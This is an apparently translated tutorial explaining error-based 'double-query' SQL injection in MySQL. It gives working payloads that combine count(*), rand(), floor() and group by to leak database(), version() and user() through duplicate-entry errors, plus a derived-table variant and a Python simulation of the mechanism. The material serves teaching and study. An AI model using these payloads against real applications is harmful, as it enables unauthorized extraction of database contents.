Dual-query Injection

Source: Internet
Author: User
In my previous article, http://leaver.me/archives/2726.html, I said that double-query injection is difficult to explain clearly. This time I will try. I have read through the underlying principles and will try to make them clear to everyone.

Before that, recall that the keyword for a query is select, which everyone knows. A subquery can be understood simply as a select statement nested inside another select statement; the inner select is the subquery.

Let's look at a simple example:

Select concat((select database()));

In actual execution the subquery runs first: select database() looks up the current database and passes the result to the concat function, which concatenates strings. For example, concat('A', 'B') returns AB.

Principle:

Dual-query injection requires understanding four functions/statements:
1. rand() // random number function
2. floor() // rounding-down function
3. count() // aggregate function
4. group by clause // grouping statement

In one sentence: researchers discovered that when a group by clause is used together with an aggregate function such as count(), part of the query result is displayed in the error message.

Take a local database named security as an example.
First, enter

mysql -u root -ptoor

This connects to the database server (the password here is toor).
Then switch to the security database with use security, because one server may host multiple databases.

Then we will execute the previous simple subquery example.

SELECT concat((select database()));

Security is displayed, that is, the name of the current database.
Then let's test the usage of concat. Input

SELECT concat('string1','string2');

Apparently, the result is string1string2.


Then let's test what the random function rand () is doing.

Select rand();

Run it several times.

We can see that this function returns a number between 0 and 1.
Now let's look at the rounding-down function.

Select floor(1.1123456);


This function returns the largest integer smaller than or equal to the number you entered.

Now let's look at a simple building block of double-query injection. In my previous article you will also have seen this subquery:

SELECT floor(rand()*2);

Read it from the inside out. rand() returns a decimal between 0 and 1. Multiplied by 2, the value lies between 0 and 2. Then floor() is applied, and the result can only be 0 or 1. That is, the query returns either 0 or 1.
Now something slightly harder. Look at this query:

SELECT CONCAT((SELECT database()), FLOOR(RAND()*2));

Don't be afraid. First look at the inner SELECT database(): it returns the database name, here security. FLOOR(RAND()*2) was explained above: it is either 0 or 1. concat joins the two results, so the result is either security0 or security1.


If we append from <table name> to the end of this statement, a set of security0 or security1 rows is returned, one per row in the table. For example, a table with five administrators returns five records. Here the users table has 13 users, so 13 records are returned.

If it is from information_schema.schemata, which lists all of the database names in MySQL, and the local machine has three databases, then three results are returned.

Now we are going to add the Group By statement.
We query against information_schema.tables or information_schema.columns, because those tables contain many rows. That makes it easy to generate many random values, so the results are not all security0, which is what the trick needs.

select concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a;

Let me explain this first. We give the result of concat((select database()), floor(rand()*2)) the alias a, and then group by it. In this way all the security0 rows go into one group and all the security1 rows into another, so only two rows remain.

Note: database() here can be replaced with any function whose result you want to read, such as version(), user() or datadir(), or with another query, for example one that looks up table names or column names. The principle is the same.

The last highlight is coming ..
We enter this line; note that the aggregate function count(*) has been added:

select count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a;

An error is reported:

ERROR 1062 (23000): Duplicate entry 'security1' for key 'group_key'

The duplicate key value contains security, the result of our query.
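Why does count(*) plus group by produce this duplicate? MySQL evaluates the grouping expression once to look the group up in its temporary table and again when it inserts a missing group, and because rand() is non-deterministic the second value can already be present. The following simulation is an added example, not the original author's code; `group_by_rand_key` and `error_rate` are hypothetical helpers, and the bit sequences are constructed stand-ins for successive floor(rand()*2) values. It also shows a generalization the text only hints at: with unseeded rand() the error fires in only about half of the runs, which is why the author queries a table with many rows.

```python
import random

class DuplicateEntry(Exception):
    """Stands in for MySQL's ERROR 1062 (23000)."""

def group_by_rand_key(bits, secret, nrows):
    """Simulate the GROUP BY temporary table MySQL builds for
       select count(*), concat(secret, floor(rand()*2)) as a ... group by a
    `bits` yields successive values of floor(rand()*2); `nrows` is the
    number of rows in the FROM table. The key is evaluated once to look
    the group up and AGAIN when a missing group is inserted, so the
    inserted key may collide with one that already exists."""
    groups = {}
    for _ in range(nrows):
        key = f"{secret}{next(bits)}"          # first evaluation: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = f"{secret}{next(bits)}"          # second evaluation: insert
        if key in groups:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups

def duplicate_message(bits, secret, nrows):
    """Return the ERROR 1062 text if the run errors, else None."""
    try:
        group_by_rand_key(bits, secret, nrows)
    except DuplicateEntry as e:
        return str(e)
    return None

def rand_bits(rng):
    """Endless stream of floor(rand()*2) values for an unseeded rand()."""
    while True:
        yield int(rng.random() * 2)

def error_rate(nrows, trials=2000, seed=1):
    """Fraction of runs that end in ERROR 1062 for a table of nrows rows."""
    rng = random.Random(seed)   # seeded only so the estimate is repeatable
    hits = sum(duplicate_message(rand_bits(rng), "security", nrows) is not None
               for _ in range(trials))
    return hits / trials

if __name__ == "__main__":
    # constructed sequence: row 1 looks up 0, inserts 1; row 2 finds 1;
    # row 3 looks up 0, misses, re-evaluates to 1 -> duplicate key
    print(duplicate_message(iter([0, 1, 1, 0, 1]), "security", 3))
    print(error_rate(13))   # roughly 0.5
```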
You can query the version as follows:

select count(*), concat((select version()), floor(rand()*2)) as a from information_schema.tables group by a;

Here database() has simply been replaced with version().

Let's look at another one.

select count(*), concat('~', (select user()), '~', floor(rand()*2)) as a from information_schema.tables group by a;

An error is reported:

ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

The ~ symbol here is only used to make the result easier to pick out.

There is also a more complicated form, called a derived table. It has the shape

select 1 from (subquery) x;

For example:

select 1 from (select count(*), concat('~', (select user()), '~', floor(rand()*2)) as a from information_schema.tables group by a) x;

You can refer to my previous article. I believe it is clear.

Original article: "Dual-query injection explained in detail". Thanks to the original author for sharing it.
